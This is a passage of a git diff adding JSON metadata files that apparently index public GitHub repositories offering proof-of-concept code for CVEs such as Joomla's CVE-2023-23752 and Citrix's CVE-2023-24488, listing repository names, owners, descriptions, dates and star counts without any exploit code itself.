+ "login": "Ly0kha",
+ "id": 8098943,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8098943?v=4",
+ "html_url": "https:\/\/github.com\/Ly0kha"
+ },
+ "html_url": "https:\/\/github.com\/Ly0kha\/Joomla-CVE-2023-23752-Exploit-Script",
+ "description": "Joomla CVE-2023-23752 Exploit Script",
+ "fork": false,
+ "created_at": "2023-11-29T17:01:08Z",
+ "updated_at": "2023-11-29T17:03:00Z",
+ "pushed_at": "2023-11-29T17:07:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 725708886,
+ "name": "CVE-2023-23752",
+ "full_name": "r3dston3\/CVE-2023-23752",
+ "owner": {
+ "login": "r3dston3",
+ "id": 152495093,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152495093?v=4",
+ "html_url": "https:\/\/github.com\/r3dston3"
+ },
+ "html_url": "https:\/\/github.com\/r3dston3\/CVE-2023-23752",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-30T17:55:38Z",
+ "updated_at": "2024-02-21T00:50:58Z",
+ "pushed_at": "2023-11-30T18:07:48Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 725802473,
+ "name": "CVE-2023-23752",
+ "full_name": "svaltheim\/CVE-2023-23752",
+ "owner": {
+ "login": "svaltheim",
+ "id": 30341113,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30341113?v=4",
+ "html_url": "https:\/\/github.com\/svaltheim"
+ },
+ "html_url": "https:\/\/github.com\/svaltheim\/CVE-2023-23752",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-30T22:47:40Z",
+ "updated_at": "2023-11-30T23:01:00Z",
+ "pushed_at": "2023-11-30T23:03:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 725855935,
+ "name": "Joomla-CVE-2023-23752",
+ "full_name": "Fernando-olv\/Joomla-CVE-2023-23752",
+ "owner": {
+ "login": "Fernando-olv",
+ "id": 70062249,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70062249?v=4",
+ "html_url": "https:\/\/github.com\/Fernando-olv"
+ },
+ "html_url": "https:\/\/github.com\/Fernando-olv\/Joomla-CVE-2023-23752",
+ "description": "This Python implementation serves an educational purpose by demonstrating the exploitation of CVE-2023-23752. The code provides insight into the vulnerability's exploitation.",
+ "fork": false,
+ "created_at": "2023-12-01T02:25:04Z",
+ "updated_at": "2023-12-04T21:33:52Z",
+ "pushed_at": "2023-12-04T00:34:37Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 727232698,
+ "name": "CVE-2023-23752-EXPLOIT",
+ "full_name": "K3ysTr0K3R\/CVE-2023-23752-EXPLOIT",
+ "owner": {
+ "login": "K3ysTr0K3R",
+ "id": 70909693,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4",
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R"
+ },
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2023-23752-EXPLOIT",
+ "description": "A PoC exploit for CVE-2023-23752 - Joomla Improper Access Check in Versions 4.0.0 through 4.2.7",
+ "fork": false,
+ "created_at": "2023-12-04T13:05:08Z",
+ "updated_at": "2024-06-25T15:21:21Z",
+ "pushed_at": "2023-12-04T13:30:56Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-23752",
+ "exploit",
+ "hacking",
+ "joomla",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 730330313,
+ "name": "CVE-2023-23752_Joomla",
+ "full_name": "hadrian3689\/CVE-2023-23752_Joomla",
+ "owner": {
+ "login": "hadrian3689",
+ "id": 71423134,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71423134?v=4",
+ "html_url": "https:\/\/github.com\/hadrian3689"
+ },
+ "html_url": "https:\/\/github.com\/hadrian3689\/CVE-2023-23752_Joomla",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-11T17:30:31Z",
+ "updated_at": "2023-12-11T17:34:23Z",
+ "pushed_at": "2023-12-11T17:34:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 730952063,
+ "name": "CVE-2023-23752",
+ "full_name": "C1ph3rX13\/CVE-2023-23752",
+ "owner": {
+ "login": "C1ph3rX13",
+ "id": 80873500,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4",
+ "html_url": "https:\/\/github.com\/C1ph3rX13"
+ },
+ "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-23752",
+ "description": "CVE-2023-23752 Joomla Unauthenticated Information Disclosure",
+ "fork": false,
+ "created_at": "2023-12-13T03:13:54Z",
+ "updated_at": "2023-12-13T03:32:32Z",
+ "pushed_at": "2023-12-25T10:24:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 732835153,
+ "name": "CVE-2023-23752",
+ "full_name": "JeneralMotors\/CVE-2023-23752",
+ "owner": {
+ "login": "JeneralMotors",
+ "id": 60910202,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60910202?v=4",
+ "html_url": "https:\/\/github.com\/JeneralMotors"
+ },
+ "html_url": "https:\/\/github.com\/JeneralMotors\/CVE-2023-23752",
+ "description": "An access control flaw was identified, potentially leading to unauthorized access to critical webservice endpoints within Joomla! CMS versions 4.0.0 through 4.2.7. This vulnerability could be exploited by attackers to gain unauthorized access to sensitive information or perform unauthorized actions.",
+ "fork": false,
+ "created_at": "2023-12-18T00:47:27Z",
+ "updated_at": "2023-12-18T01:42:50Z",
+ "pushed_at": "2023-12-18T04:27:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 733652712,
+ "name": "CVE-2023-23752",
+ "full_name": "gunzf0x\/CVE-2023-23752",
+ "owner": {
+ "login": "gunzf0x",
+ "id": 31874167,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31874167?v=4",
+ "html_url": "https:\/\/github.com\/gunzf0x"
+ },
+ "html_url": "https:\/\/github.com\/gunzf0x\/CVE-2023-23752",
+ "description": "Binaries for \"CVE-2023-23752\"",
+ "fork": false,
+ "created_at": "2023-12-19T20:18:49Z",
+ "updated_at": "2023-12-19T20:32:57Z",
+ "pushed_at": "2023-12-19T20:31:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "binaries-included",
+ "cve-2023-23752",
+ "go",
+ "golang"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 734079534,
+ "name": "CVE-2023-23752",
+ "full_name": "TindalyTn\/CVE-2023-23752",
+ "owner": {
+ "login": "TindalyTn",
+ "id": 104759010,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104759010?v=4",
+ "html_url": "https:\/\/github.com\/TindalyTn"
+ },
+ "html_url": "https:\/\/github.com\/TindalyTn\/CVE-2023-23752",
+ "description": "Mass Scanner for CVE-2023-23752",
+ "fork": false,
+ "created_at": "2023-12-20T20:20:15Z",
+ "updated_at": "2023-12-20T20:21:34Z",
+ "pushed_at": "2023-12-20T20:22:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 736906405,
+ "name": "CVE-2023-23752",
+ "full_name": "shellvik\/CVE-2023-23752",
+ "owner": {
+ "login": "shellvik",
+ "id": 86082783,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86082783?v=4",
+ "html_url": "https:\/\/github.com\/shellvik"
+ },
+ "html_url": "https:\/\/github.com\/shellvik\/CVE-2023-23752",
+ "description": "Joomla Information disclosure exploit code written in C++.",
+ "fork": false,
+ "created_at": "2023-12-29T08:09:24Z",
+ "updated_at": "2023-12-29T08:09:24Z",
+ "pushed_at": "2023-12-29T08:09:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 759783810,
+ "name": "CVE-2023-23752",
+ "full_name": "Rival420\/CVE-2023-23752",
+ "owner": {
+ "login": "Rival420",
+ "id": 51548322,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51548322?v=4",
+ "html_url": "https:\/\/github.com\/Rival420"
+ },
+ "html_url": "https:\/\/github.com\/Rival420\/CVE-2023-23752",
+ "description": "Joomla! < 4.2.8 - Unauthenticated information disclosure exploit",
+ "fork": false,
+ "created_at": "2024-02-19T10:27:01Z",
+ "updated_at": "2024-02-19T10:27:35Z",
+ "pushed_at": "2024-02-19T11:26:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 770897039,
+ "name": "CVE-2023-23752",
+ "full_name": "JohnDoeAnonITA\/CVE-2023-23752",
+ "owner": {
+ "login": "JohnDoeAnonITA",
+ "id": 162304433,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162304433?v=4",
+ "html_url": "https:\/\/github.com\/JohnDoeAnonITA"
+ },
+ "html_url": "https:\/\/github.com\/JohnDoeAnonITA\/CVE-2023-23752",
+ "description": "CVE-2023-23752 Data Extractor",
+ "fork": false,
+ "created_at": "2024-03-12T10:59:10Z",
+ "updated_at": "2024-05-03T08:40:27Z",
+ "pushed_at": "2024-05-03T09:05:18Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 785240418,
+ "name": "CVE-2023-23752",
+ "full_name": "0xWhoami35\/CVE-2023-23752",
+ "owner": {
+ "login": "0xWhoami35",
+ "id": 107396843,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107396843?v=4",
+ "html_url": "https:\/\/github.com\/0xWhoami35"
+ },
+ "html_url": "https:\/\/github.com\/0xWhoami35\/CVE-2023-23752",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-11T13:39:44Z",
+ "updated_at": "2024-04-14T08:33:21Z",
+ "pushed_at": "2024-04-11T14:46:16Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 787014993,
+ "name": "CVE-2023-23752-Python",
+ "full_name": "mariovata\/CVE-2023-23752-Python",
+ "owner": {
+ "login": "mariovata",
+ "id": 33606897,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33606897?v=4",
+ "html_url": "https:\/\/github.com\/mariovata"
+ },
+ "html_url": "https:\/\/github.com\/mariovata\/CVE-2023-23752-Python",
+ "description": "Joomla! < 4.2.8 - Unauthenticated information disclosure",
+ "fork": false,
+ "created_at": "2024-04-15T18:18:02Z",
+ "updated_at": "2024-04-15T19:36:05Z",
+ "pushed_at": "2024-04-15T19:34:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 793175121,
+ "name": "CVE-2023-23752",
+ "full_name": "0xx01\/CVE-2023-23752",
+ "owner": {
+ "login": "0xx01",
+ "id": 130947610,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130947610?v=4",
+ "html_url": "https:\/\/github.com\/0xx01"
+ },
+ "html_url": "https:\/\/github.com\/0xx01\/CVE-2023-23752",
+ "description": "A simple bash script to exploit Joomla! < 4.2.8 - Unauthenticated information disclosure",
+ "fork": false,
+ "created_at": "2024-04-28T16:32:21Z",
+ "updated_at": "2024-04-28T16:50:44Z",
+ "pushed_at": "2024-04-28T16:50:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 796038372,
+ "name": "CVE-2023-23752",
+ "full_name": "c0d3cr4f73r\/CVE-2023-23752",
+ "owner": {
+ "login": "c0d3cr4f73r",
+ "id": 66146701,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4",
+ "html_url": "https:\/\/github.com\/c0d3cr4f73r"
+ },
+ "html_url": "https:\/\/github.com\/c0d3cr4f73r\/CVE-2023-23752",
+ "description": "Joomla! v4.2.8 - Unauthenticated information disclosure",
+ "fork": false,
+ "created_at": "2024-05-04T18:44:12Z",
+ "updated_at": "2024-05-31T14:11:29Z",
+ "pushed_at": "2024-05-31T14:11:26Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 796329590,
+ "name": "CVE-2023-23752-Joomla-v4.2.8",
+ "full_name": "mil4ne\/CVE-2023-23752-Joomla-v4.2.8",
+ "owner": {
+ "login": "mil4ne",
+ "id": 89859279,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89859279?v=4",
+ "html_url": "https:\/\/github.com\/mil4ne"
+ },
+ "html_url": "https:\/\/github.com\/mil4ne\/CVE-2023-23752-Joomla-v4.2.8",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-05T16:16:03Z",
+ "updated_at": "2024-05-05T16:42:42Z",
+ "pushed_at": "2024-05-05T16:42:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-23946.json b/2023/CVE-2023-23946.json
new file mode 100644
index 0000000000..7534e470aa
--- /dev/null
+++ b/2023/CVE-2023-23946.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 688420580,
+ "name": "CVE-2023-23946-POC",
+ "full_name": "bruno-1337\/CVE-2023-23946-POC",
+ "owner": {
+ "login": "bruno-1337",
+ "id": 71904759,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71904759?v=4",
+ "html_url": "https:\/\/github.com\/bruno-1337"
+ },
+ "html_url": "https:\/\/github.com\/bruno-1337\/CVE-2023-23946-POC",
+ "description": "Explanation and POC of the CVE-2023-23946",
+ "fork": false,
+ "created_at": "2023-09-07T10:07:25Z",
+ "updated_at": "2023-09-07T10:07:26Z",
+ "pushed_at": "2023-09-13T02:57:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-24044.json b/2023/CVE-2023-24044.json
new file mode 100644
index 0000000000..4ac2ef220d
--- /dev/null
+++ b/2023/CVE-2023-24044.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 806027931,
+ "name": "CVE-2023-24044",
+ "full_name": "Cappricio-Securities\/CVE-2023-24044",
+ "owner": {
+ "login": "Cappricio-Securities",
+ "id": 102907425,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4",
+ "html_url": "https:\/\/github.com\/Cappricio-Securities"
+ },
+ "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2023-24044",
+ "description": "Plesk Obsidian <=18.0.49 - Open Redirect",
+ "fork": false,
+ "created_at": "2024-05-26T06:56:05Z",
+ "updated_at": "2024-06-24T09:05:16Z",
+ "pushed_at": "2024-06-24T09:03:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-24044",
+ "cve-2023-24044-scanner",
+ "openredirect",
+ "plesk-obsidian",
+ "plesk-obsidian-open-redirect",
+ "wapt"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-24078.json b/2023/CVE-2023-24078.json
new file mode 100644
index 0000000000..3471199803
--- /dev/null
+++ b/2023/CVE-2023-24078.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 728491152,
+ "name": "CVE-2023-24078",
+ "full_name": "ag-rodriguez\/CVE-2023-24078",
+ "owner": {
+ "login": "ag-rodriguez",
+ "id": 55252902,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55252902?v=4",
+ "html_url": "https:\/\/github.com\/ag-rodriguez"
+ },
+ "html_url": "https:\/\/github.com\/ag-rodriguez\/CVE-2023-24078",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-07T03:45:27Z",
+ "updated_at": "2023-12-07T03:47:00Z",
+ "pushed_at": "2023-12-07T04:56:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-24100.json b/2023/CVE-2023-24100.json
new file mode 100644
index 0000000000..88bb8dd72a
--- /dev/null
+++ b/2023/CVE-2023-24100.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 727552823,
+ "name": "CVE-2023-24100",
+ "full_name": "badboycxcc\/CVE-2023-24100",
+ "owner": {
+ "login": "badboycxcc",
+ "id": 72059221,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72059221?v=4",
+ "html_url": "https:\/\/github.com\/badboycxcc"
+ },
+ "html_url": "https:\/\/github.com\/badboycxcc\/CVE-2023-24100",
+ "description": "nuclei templates CVE RCE CNVD IoT",
+ "fork": false,
+ "created_at": "2023-12-05T05:00:27Z",
+ "updated_at": "2023-12-30T06:44:58Z",
+ "pushed_at": "2023-12-06T13:48:06Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-24203.json b/2023/CVE-2023-24203.json
new file mode 100644
index 0000000000..ca5c7ecf58
--- /dev/null
+++ b/2023/CVE-2023-24203.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 800288554,
+ "name": "CVE-2023-24203-and-CVE-2023-24204",
+ "full_name": "momo1239\/CVE-2023-24203-and-CVE-2023-24204",
+ "owner": {
+ "login": "momo1239",
+ "id": 34490185,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34490185?v=4",
+ "html_url": "https:\/\/github.com\/momo1239"
+ },
+ "html_url": "https:\/\/github.com\/momo1239\/CVE-2023-24203-and-CVE-2023-24204",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-14T03:53:03Z",
+ "updated_at": "2024-05-14T04:13:00Z",
+ "pushed_at": "2024-05-14T04:12:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-24329.json b/2023/CVE-2023-24329.json
new file mode 100644
index 0000000000..8ffd27d872
--- /dev/null
+++ b/2023/CVE-2023-24329.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 679660290,
+ "name": "CVE-2023-24329-PoC",
+ "full_name": "H4R335HR\/CVE-2023-24329-PoC",
+ "owner": {
+ "login": "H4R335HR",
+ "id": 121650077,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121650077?v=4",
+ "html_url": "https:\/\/github.com\/H4R335HR"
+ },
+ "html_url": "https:\/\/github.com\/H4R335HR\/CVE-2023-24329-PoC",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-08-17T10:33:52Z",
+ "updated_at": "2023-08-17T10:37:28Z",
+ "pushed_at": "2023-08-17T10:41:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 680228161,
+ "name": "CVE-2023-24329-codeql-test",
+ "full_name": "Pandante-Central\/CVE-2023-24329-codeql-test",
+ "owner": {
+ "login": "Pandante-Central",
+ "id": 128833419,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128833419?v=4",
+ "html_url": "https:\/\/github.com\/Pandante-Central"
+ },
+ "html_url": "https:\/\/github.com\/Pandante-Central\/CVE-2023-24329-codeql-test",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-08-18T16:53:11Z",
+ "updated_at": "2023-08-18T16:55:17Z",
+ "pushed_at": "2023-08-18T17:34:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 700639754,
+ "name": "CVE-2023-24329-Exploit",
+ "full_name": "JawadPy\/CVE-2023-24329-Exploit",
+ "owner": {
+ "login": "JawadPy",
+ "id": 98477272,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98477272?v=4",
+ "html_url": "https:\/\/github.com\/JawadPy"
+ },
+ "html_url": "https:\/\/github.com\/JawadPy\/CVE-2023-24329-Exploit",
+ "description": "Example of CVE-2023-24329 ",
+ "fork": false,
+ "created_at": "2023-10-05T01:55:05Z",
+ "updated_at": "2023-10-13T07:44:21Z",
+ "pushed_at": "2023-10-13T07:42:36Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-2437.json b/2023/CVE-2023-2437.json
new file mode 100644
index 0000000000..a5d6686bc7
--- /dev/null
+++ b/2023/CVE-2023-2437.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 766289815,
+ "name": "CVE-2023-2437",
+ "full_name": "RxRCoder\/CVE-2023-2437",
+ "owner": {
+ "login": "RxRCoder",
+ "id": 161977912,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161977912?v=4",
+ "html_url": "https:\/\/github.com\/RxRCoder"
+ },
+ "html_url": "https:\/\/github.com\/RxRCoder\/CVE-2023-2437",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-02T21:09:07Z",
+ "updated_at": "2024-03-02T21:18:30Z",
+ "pushed_at": "2024-03-02T21:19:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-24488.json b/2023/CVE-2023-24488.json
new file mode 100644
index 0000000000..6c3c0511fd
--- /dev/null
+++ b/2023/CVE-2023-24488.json
@@ -0,0 +1,154 @@
+[
+ {
+ "id": 661072883,
+ "name": "CVE-2023-24488-PoC",
+ "full_name": "SirBugs\/CVE-2023-24488-PoC",
+ "owner": {
+ "login": "SirBugs",
+ "id": 37689994,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37689994?v=4",
+ "html_url": "https:\/\/github.com\/SirBugs"
+ },
+ "html_url": "https:\/\/github.com\/SirBugs\/CVE-2023-24488-PoC",
+ "description": "CVE-2023-24488 PoC",
+ "fork": false,
+ "created_at": "2023-07-01T17:47:17Z",
+ "updated_at": "2024-04-20T01:38:59Z",
+ "pushed_at": "2023-07-01T17:49:16Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 661909414,
+ "name": "CVE-2023-24488",
+ "full_name": "Abo5\/CVE-2023-24488",
+ "owner": {
+ "login": "Abo5",
+ "id": 40110835,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40110835?v=4",
+ "html_url": "https:\/\/github.com\/Abo5"
+ },
+ "html_url": "https:\/\/github.com\/Abo5\/CVE-2023-24488",
+ "description": "CVE-2023-24488.rb The provided script is a Ruby script used to check and detect the CVE-2023-24488 security vulnerability in Citrix Gateway and Citrix ADC.",
+ "fork": false,
+ "created_at": "2023-07-04T00:29:56Z",
+ "updated_at": "2023-11-22T10:41:43Z",
+ "pushed_at": "2023-07-04T00:40:46Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
